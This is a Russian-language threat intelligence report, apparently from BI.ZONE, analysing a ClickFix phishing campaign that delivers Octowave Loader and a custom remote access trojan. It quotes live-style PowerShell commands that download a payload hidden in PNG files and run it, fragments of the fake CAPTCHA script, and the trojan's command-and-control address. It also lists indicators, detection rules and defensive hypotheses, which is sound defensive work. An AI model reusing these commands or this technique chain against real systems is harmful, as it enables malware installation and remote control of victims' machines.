Пройдите проверку и получите ВПО: ClickFix добралась до России
В начале июня 2025 года специалисты BI.ZONE Threat Intelligence обнаружили целевые атаки с применением ClickFix. Эту технику социальной инженерии используют, чтобы убедить жертву самостоятельно запустить вредоносный скрипт. Ранее ClickFix применяли только за рубежом, а теперь злоумышленники научились адаптировать технику под целевой регион для атак на компании в России.
Киберпреступники часто отправляют фишинговые рассылки от имени крупных и известных организаций или ссылаются на них в письмах. Чем сильнее бренд компании, тем охотнее злоумышленники используют ее айдентику. Узнаваемые логотипы и прочие элементы фирменного стиля повышают доверие со стороны пользователей, подталкивая их открыть письмо. Важно помнить, что обладатель торговой марки не несет ответственности за действия преступников и причиненный в результате ущерб.
- Злоумышленники регулярно обогащают свой арсенал новыми техниками и адаптируют их под целевой регион.
- Атакующие все чаще используют DLL side‑loading. Это значительно затрудняет обнаружение атаки из‑за использования доверенных исполняемых файлов.
- Злоумышленники продолжают активно разрабатывать собственные инструменты, несмотря на то, что ВПО доступны на теневых ресурсах и в открытых источниках.
Злоумышленники с помощью фишинговых сообщений распространяли PDF‑документы, содержащие ссылки на сетевые ресурсы злоумышленников, где применялась техника социальной инженерии ClickFix.
Рассылаемые PDF-документы содержали размытый текст неких реальных документов, представляющих собой аналитические отчеты по мониторингу рисков, пояснения по предоставлению доступа, уведомления о дисциплинарных мерах и акты проверки контрагентов.
После нажатия по кнопке «Я не робот» пользователь перенаправлялся на сетевой ресурс злоумышленников, который мимикрировал под легитимный сервис. На таком сайте пользователю предлагалось пройти CAPTCHA.
При этом на сетевом ресурсе выполнялся JavaScript-сценарий, реализующий следующие функции:
- Запрет контекстного меню.
- Получение информации о видеокарте пользователя.
- Получение CSRF-токена из cookie (не использовалось).
- Обработка клика по элементу с классом .captcha.
- Обработка ответа сервера и выполнение содержимого ответа через eval().
- Проигрывание анимации перехода и отображение следующего шага.
document.addEventListener('contextmenu', (e) => {
e.preventDefault();
});
function getGPUInfo() {
...
const renderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL);
return renderer
}
function getCSRFToken() {
return document.cookie
.split('; ')
.find(row => row.startsWith('csrftoken='))
?.split('=')[1];
}
document.querySelector('.captcha').addEventListener('click', (e) => {
...
});
body: JSON.stringify({
'key': '83566597554029358131608101665069',
'gpu': getGPUInfo()
})
.then(data => {
setTimeout(() => {
eval(data);
...
}, 1500);
})
После нажатия на сайте на кнопку «Я не робот», в буфер обмена копировалась команда PowerShell и пользователю предлагалась инструкция по выполнению этой команды.
В рамках рассматриваемой кампании злоумышленники использовали различные PowerShell-команды, вот некоторые из них:
powershell -nop -w Hidden -c "$b=(iwr 'i.imghippo[.]com/files/wN1688B.png').Content;function q($o,$s){-join[char[]]$b[$o..($o+$s-1)]};[io.file]::WriteAllBytes((q 56 40),$b[241..(241+31261183)]);saps (q 124 12) -a (q 169 51)"
powershell -nop -w Hidden -c "$b=(New-Object System.Net.WebClient).DownloadData('hxxp://docrf[.]org:7891/yandex.png');function q($o,$s){-join[char[]]$b[$o..($o+$s-1)]};[io.file]::WriteAllBytes((q 56 40),$b[241..11150064]);saps (q 124 12) -a (q 169 51)"
powershell -nop -w Hidden -c "$b=(iwr 'i.imghippo[.]com/files/SS4638dPY.png').Content;function q($o,$s){-join[char[]]$b[$o..($o+$s-1)]};[io.file]::WriteAllBytes((q 56 40),$b[241..(241+11149823)]);saps (q 124 12) -a (q 169 51)"
Примечательно, что в некоторых случаях атакующие использовали легитимный сервис для хранения изображений Imghippo.
PowerShell-команда выполняла следующие действия:
- загружала по заданной ссылке файл с расширением .png, который содержал динамически подключаемую библиотеку (DLL).
- извлекала из PNG-файла по определенным смещениям следующие данные:
- путь сохранения DLL, пример: C:\Users\Public\Downloads\LicChecker.dll;
- параметры запуска DLL, пример: rundll32.exe C:\Users\Public\Downloads\LicChecker.dll,Initialize.
DLL-файл представляет собой вредоносную программу Octowave Loader, которая реализована в виде установщика Squirrel Installer. Octowave Loader включает следующие компоненты:
- установщик легитимного ПО;
- вредоносную библиотеку, запускаемую с помощью техники DLL side‑loading;
- WAV‑файл со скрытым в нем с помощью стеганографии шелл-кодом;
- исполняемый EXE‑файл, извлеченный шелл-кодом.
Установщик выполняет следующие действия:
- Извлекает из секции ресурсов ZIP-архив и сохраняет его с именем TMP[a-f0-9]{4}.tmp в каталог %TEMP%.
- Создает каталог %LOCALAPPDATA%\Programs\Adobe Printer Driver (в другом случае %LOCALAPPDATA%\Programs\Adobe CoreSync) и распаковывает в него содержимое ZIP‑архива.
- После распаковки ищет легитимный исполняемый файл AGF3DPrinterDriver.exe (в другом случае CoreSync.exe) в каталоге, в котором есть подстрока *ver.e* (в другом случае *nc.e*). Затем этот файл запускает с помощью ShellExecuteW("open").
В распакованном каталоге хранится набор следующих файлов: легитимный исполняемый файл (AGF3DPrinterDriver.exe, CoreSync.exe), большое количество легитимных библиотек, вредоносная библиотека (apiecho.dll, D3Help3.dll), WAV-файл (Update.wav, Annual.wav), конфигурационный файл загрузчика с зашифрованным содержимым (Cleanup.raw, Supplement.pak).
Техника DLL side-loading реализована следующим образом:
- exe загружает легитимную библиотеку tbb.dll, которая загружает вредоносную библиотеку apiecho.dll.
- exe загружает легитимную библиотеку gude.dll, которая загружает вредоносную библиотеку D3Help3.dll.
Вредоносная библиотека считывает WAV‑файл, расшифровывает шелл-код, который также обращается к WAV‑файлу, чтобы получить исполняемый компонент загрузчика Octowave Loader.
Исполняемый компонент загрузчика расшифровывает из конфигурационного файла (.raw, .pak) конечную вредоносную нагрузку, реализованную в виде шелл-кода, который представляет собой неклассифицированный ранее троян удаленного доступа (RAT).
Все вредоносные действия происходят в памяти легитимного процесса AGF3DPrinterDriver.exe (CoreSync.exe).
Octowave Loader создает копии конфигурационных файлов (примеры для двух случаев):
- %LOCALAPPDATA%\Programs\Adobe Printer Driver\Galleries\Achievement.db
- %LOCALAPPDATA%\Programs\Adobe CoreSync\CoreSync\Analysis.db
Octowave Loader закрепляется в системе через ключ реестра Run и задачу в планировщике Windows:
Реестр:
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] Adobe Printer Driver = "%LOCALAPPDATA%\Programs\Adobe Printer Driver\AGF3DPrinterDriver.exe"
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] Adobe Sync Pro = "%LOCALAPPDATA%\Programs\Adobe CoreSync\CoreSync\CoreSync.exe"
Задача в планировщике задач Windows:
- Создается задача с именем Adobe Printer Driver, запускающая процесс %LOCALAPPDATA%\Programs\Adobe Printer Driver\AGF3DPrinterDriver.exe при входе пользователя в систему.
- Создается задача с именем Adobe Sync Pro, запускающая процесс %LOCALAPPDATA%\Programs\Adobe CoreSync\CoreSync\CoreSync.exe при входе пользователя в систему.
Расшифрованный из конфигурационного файла загрузчика Octowave Loader шелл-код является неклассифицированным RAT. Мы предполагаем, что злоумышленники разработали это вредоносное программное обеспечение самостоятельно.
Функциональные возможности RAT:
- Получение адресов, нужных для корректной работы функций вредоносной программы. Названия используемых функций захешированы с использованием алгоритма MurmurHash3.
- Создание файла %ProgramData%\lockfile и вызов API-функции LockFile. Возможно, файл используется как маркер либо в качестве мьютекса.
- Проверка наличия ключа реестра [HKCU\SOFTWARE\<GetVolumeInformation()>], где GetVolumeInformation() берется от диска C:\. Если такого ключа нет, тогда он создается. Далее создается параметр Default = <CoCreateGuid()>, где CoCreateGuid() генерирует GUID. Пример: [HKEY_CURRENT_USER\SOFTWARE\1239653d48e59] @="3564fcfb-e6e1-458c-a348-9ce11f88caef"
- Сбор первичной информации о системе. Собираемая информация: GUID вредоносной программы, имя компьютера (NetBIOS), имя пользователя (GetEnvironmentVariableW("USERNAME")), имя компьютера (GetEnvironmentVariableW("COMPUTERNAME")), домен (GetEnvironmentVariableW("USERDOMAIN")), версия ОС Windows, разрядность системы, имя процесса, в котором исполняется вредоносная программа, права пользователя.
- Шифрование собранной информации алгоритмом ChaCha20 и отправка зашифрованных данных на сервер через HTTP POST-запрос по сетевому адресу hxxp://82.117.87[.]103/q?=furries. При отправке сетевого запроса используется следующая строка заголовка User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.7.00.3653 Chrome/102.0.5005.197 Electron/19.1.8 Safari/537.36.
От сервера, предположительно, приходит следующая структура:
struct CommandPacket
{
int status; <— если значение 1 — выполнение команды, если значение 0 — программа засыпает на 2 минуты.
struct PSCommandList *ps_cmds; <— список команд PowerShell.
struct Command *commands; <— варианты команд, выполняемых RAT.
};
Структура списка команд PowerShell:
struct PSCommandList
{
struct PSCommandList *next;
void *result_identifier;
char *command_to_execute;
};
Структура команды:
struct Command
{
struct Command *next;
char *result_data_to_send;
char *download_url;
int command_type;
char *dll_params;
};
Стоит отметить, что все структуры представляют собой связный список.
- Выполнение PowerShell-команд. Команды выполняются следующим образом: %WINDIR%\System32\WindowsPowershell\v0\powershell.exe -NoLogo -NoProfile -Command <command>. Результат отправляется на сервер управления.
- Выполнение команд, полученных от сервера управления:
| Код команды | Описание |
|---|---|
| 1 |
Скачать по полученной от сервера ссылке файл с расширением .exe, сохранить в каталог %TEMP% со случайным именем [a-z]{20}\.exe, запустить загруженный файл с помощью ShellExecuteW("open", <filePath>) |
| 2 |
Получить параметры запуска загружаемого по ссылке DLL-файла, скачать по полученной от сервера ссылке файл с расширением .dll, сохранить в каталог %TEMP% со случайным именем [a-z]{20}\.dll, запустить загруженный файл с помощью ShellExecuteW("open") и rundll32.exe. Формируется строка вида: %WINDIR%\System32\rundll32.exe <dllPath>,<Params> |
| 3 |
Скачать по полученной от сервера ссылке файл с расширением .dll, сохранить в каталог %TEMP% со случайным именем [a-z]{20}\.dll, запустить загруженный файл с помощью ShellExecuteW("open") и regsvr32.exe. Формируется строка вида: %WINDIR%\System32\regsvr32.exe /s <dllPath> |
| 4 |
Функция ничего не делает, возвращает значение 1. Либо атакующие не реализовали логику выполнения команды, либо используют ее как ping/heartbeat, возвращая постоянно 1 |
673e826846b40f16508677efe1c7a272865157fb48c1f81ff7975af3b2a3149e
b984fc4ba98c3e787eaa7c8bb0def3f704849753bb1a51af816bdc91be24d3e4
2c86d226fb4584ca7bd1284600b8c6ea5a1f312de78595b5c22ff6bc1c6522f3
3ee3d3d0a515b24f1b104cb8ec1b8d01b5af63c55c9c8424230826b736d70549
2ab9b583b5c85b3c2e927d02f7ee316f9e5eaf2db394a8c1d970b428dabe08a0
cce5b6dcdfa69e1b1e3d78ec1d3ec09c12861bf95e033d79aabe9bd2d28577ce
97b507a8d197ad901b6de1e9042b7ab94b0d263dd6c0852600ac7b80754fd686
ef16edc3b8de0f6456b4ecde12a90dc1b1678816390d01d187c73edfbaff2249
acbfd3f0768fe1f730c6f93fec4b2a9761c469226d5ac00ca7a15358e656a226
0f8635172da61dc6161b428a6b120461b5a9b04165483374b15beca5f0a12bc8
e633535706b7654f458ada840be494f7460a8fbfbf0078c95dc5785213ba14de
yasec[.]ru
docrf[.]org
82.117.87[.]103
| Тактика | Техника | Процедура |
|---|---|---|
| Initial Access |
Phishing |
Атакующие распространяют с помощью фишинговых сообщений вредоносные PDF‑документы |
| Execution |
Command and Scripting Interpreter: PowerShell |
Атакующие используют PowerShell-команды для загрузки и запуска вредоносного кода |
|
Native API |
Атакующие используют неклассифицированный троян удаленного доступа для запуска загружаемых с управляющего сервера исполняемых файлов с помощью ShellExecuteW("open") |
|
|
User Execution: Malicious Link |
Атакующие предпринимают попытки убедить жертву перейти по ссылке в PDF-документе и пройти фейковую CAPTCHA |
|
|
User Execution: Malicious File |
Жертва должна запустить вредоносный PDF-документ с фейковой CAPTCHA и перейти по ссылке на сетевой ресурс атакующих |
|
|
User Execution: Malicious Copy and Paste |
Атакующие предпринимают попытки убедить жертву выполнить вредоносную PowerShell-команду с помощью следующих действий: Win+R -> Ctrl+V -> Enter |
|
| Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Атакующие используют Octowave Loader для закрепления в системе через ключ реестра Run |
|
Scheduled Task/Job: Scheduled Task |
Атакующие используют Octowave Loader для закрепления в системе через создание задачи в планировщике задач Windows |
|
| Defense Evasion |
Deobfuscate/Decode Files or Information |
Атакующие с помощью вредоносной DLL Octowave Loader расшифровывают из WAV‑файла шелл-код, который затем расшифровывает и запускает EXE-компонент Octowave Loader. Атакующие расшифровывают зашифрованный конфигурационный файл Octowave Loader для получения конечной нагрузки |
|
Hijack Execution Flow: DLL |
Атакующие используют технику DLL side-loading для запуска вредоносной DLL Octowave Loader с помощью легитимного исполняемого файла (AGF3DPrinterDriver.exe, CoreSync.exe) |
|
|
Obfuscated Files or Information |
Атакующие используют в неклассифицированном трояне удаленного доступа строки, формирующиеся на стеке |
|
|
Obfuscated Files or Information: Steganography |
Атакующие используют PNG-файлы для хранения исполняемого файла Octowave Loader Атакующие используют WAV-файлы для хранения шелл-кода и EXE-компонента Octowave Loader |
|
|
Obfuscated Files or Information: Dynamic API Resolution |
Атакующие используют MurmurHash3 для хеширования названий функций в неклассифицированном трояне удаленного доступа |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
Атакующие хранят конечную нагрузку в зашифрованном конфигурационном файле Octowave Loader |
|
| Discovery |
Process Discovery |
Атакующие с помощью неклассифицированного трояна удаленного доступа получают название процесса, в котором исполняется вредоносная программа |
|
System Information Discovery |
Атакующие с помощью неклассифицированного трояна удаленного доступа получают название домена системы, версия ОС Windows, разрядность |
|
|
System Owner/User Discovery |
Атакующие с помощью неклассифицированного трояна удаленного доступа получают имена пользователя и компьютера, права пользователя |
|
| Command and Control |
Application Layer Protocol: Web Protocols |
Атакующие используют неклассифицированный троян удаленного доступа, который передает зашифрованные собранные данные о системе через HTTP POST-запрос |
|
Encrypted Channel: Symmetric Cryptography |
Атакующие используют ChaCha20 для шифрования команд управляющего сервера в неклассифицированном трояне удаленного доступа |
|
|
Ingress Tool Transfer |
Атакующие используют неклассифицированный троян удаленного доступа для загрузки и запуска исполняемых файлов с сервера |
Рассматриваемая вредоносная активность обнаруживается следующими правилами BI.ZONE EDR:
- win_th_start_hidden_powershell
- win_suspicious_powershell_download_cradles
- win_th_runonce_autorun_add
- gen_ti_wolfs_network_ioc_was_detected
- gen_ti_wolfs_hash_was_detected
Для проактивного поиска киберугроз можно использовать следующие гипотезы:
- Запуск с помощью rundll32.exe и regsrv32.exe dll-библиотек из следующих папок %Temp%, %Users%, %AppData%.
- Проверка веток реестра Run/RunOnce на предмет наличия подозрительных файлов, находящихся в подпапках %LOCALAPPDATA%\Programs\.
- Проверка запланированных задач, запускающих подозрительные файлы из подпапок %LOCALAPPDATA%\Programs\.
Не нужно открывать файлы и ссылки от неизвестных адресатов. Злоумышленники распространяют ВПО с помощью фишинговых сообщений в надежде на невнимательность получателя. А еще важно быть в курсе новых техник, ведь методы атак постоянно меняются. Для этого мы рекомендуем использовать данные портала BI.ZONE Threat Intelligence. Он предоставляет информацию об актуальных кибератаках, злоумышленниках, их тактиках, техниках и используемых инструментах, а также сведения с теневых ресурсов. Эти данные помогут проактивно защищать компанию и быстро реагировать на новые инциденты кибербезопасности.
